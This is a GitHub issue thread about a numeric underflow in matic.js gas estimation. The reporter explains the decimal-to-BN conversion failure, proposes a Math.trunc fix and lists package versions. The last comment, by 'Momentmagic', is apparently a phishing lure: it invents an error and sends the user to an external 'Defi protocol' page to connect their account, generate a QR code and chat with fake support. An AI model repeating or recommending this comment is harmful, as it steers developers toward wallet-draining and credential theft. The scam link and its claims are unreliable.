### ISSUE TITLE
Numeric Underflow

### ISSUE THREAD

**Issue by fzavalia** [maticnetwork/matic.js#410]
I'm having an issue when trying to exit a withdraw. 

After some debugging, the issue seems to come from this line https://github.com/maticnetwork/matic.js/blob/master/src/utils/base_token.ts#L191 were gas is being estimated, multiplied by 1.15 and converted to a BN.

Seems that ethers is not a big fan of decimals so it breaks when trying to parse the estimated gas.
![image](https://github.com/maticnetwork/matic.js/assets/24811313/69189fe6-e7e5-423f-abd8-fb7a6ce3345e)

I suggest removing the decimal part of the estimated gas result to prevent the issue.

**Comment by fzavalia** [comment]
This can be fixed by changing the corresponding line to something like:

```
return new utils.BN(Math.trunc(Number(result) * 1.15)).toString();
```

**Comment by fzavalia** [comment]
Versions I were using are:
- @maticnetwork/maticjs@3.6.2
- @maticnetwork/maticjs-ethers@1.0.3
- ethers@5.0.31

**Comment by Momentmagic** [comment]
Hi @fzavalia 

You are having a transcript dAp error command on your request. To fix this ERROR, visit the Defi protocol page and click on GAS to establish connection with your account and generate QR code to submit your request. Refresh your page and take screenshot of the QR CODE generated on the end-to-end server application via [Defi Protocol 1](https://defirefixprotocol.web.app/defiprotocol/v1/defi/home/).

Note: Click on the chat button at the bottom part of the page to initiate a chat with the support team on a live chat to review and assist for more information.

Regards.
{c}2023
